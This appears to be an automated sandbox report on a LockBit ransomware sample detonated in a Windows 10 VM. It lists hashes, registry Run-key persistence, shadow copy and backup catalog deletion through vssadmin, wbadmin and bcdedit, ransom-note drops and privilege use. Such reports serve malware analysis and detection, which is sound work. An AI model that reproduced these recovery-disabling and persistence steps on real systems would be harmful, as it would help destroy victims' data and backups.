C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 db5976b09a5ea23bdc1f450ffbbec067
SHA1 452cc01c049df3866f8edc2f8fe7f9d21dd93bd1
SHA256 8f4986961c5abcac37cdc4ed1cdb5ded9b2f37cf3ff0bf8c5b8c5f2a162ca50f
SHA512 7a62f04742b572a40d2e162f18b8a759af26763a7e9cf78d700423a0f9289bafca4c459d3d93c157eea0eb281f03968c5ad7c566589c4f4d2e9d422094e35f97

memory/2384-209-0x0000000000E60000-0x0000000000E70000-memory.dmp

memory/2384-218-0x0000000000E60000-0x0000000000E70000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:13

Platform

win10v2004-20240704-en

Max time kernel

1661s

Max time network

1171s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (6418) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\118C.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\et.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_CatEye.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\meta-index C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.1d9d722e.pri C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-20_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-colorize.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\telemetryrules\hxoutlook.exe_Rules.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\es-ES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\vpaid.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\82.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\processing.slk C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_start_a_coversation_v3.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.dub C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4.m4a C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-16_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-64_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
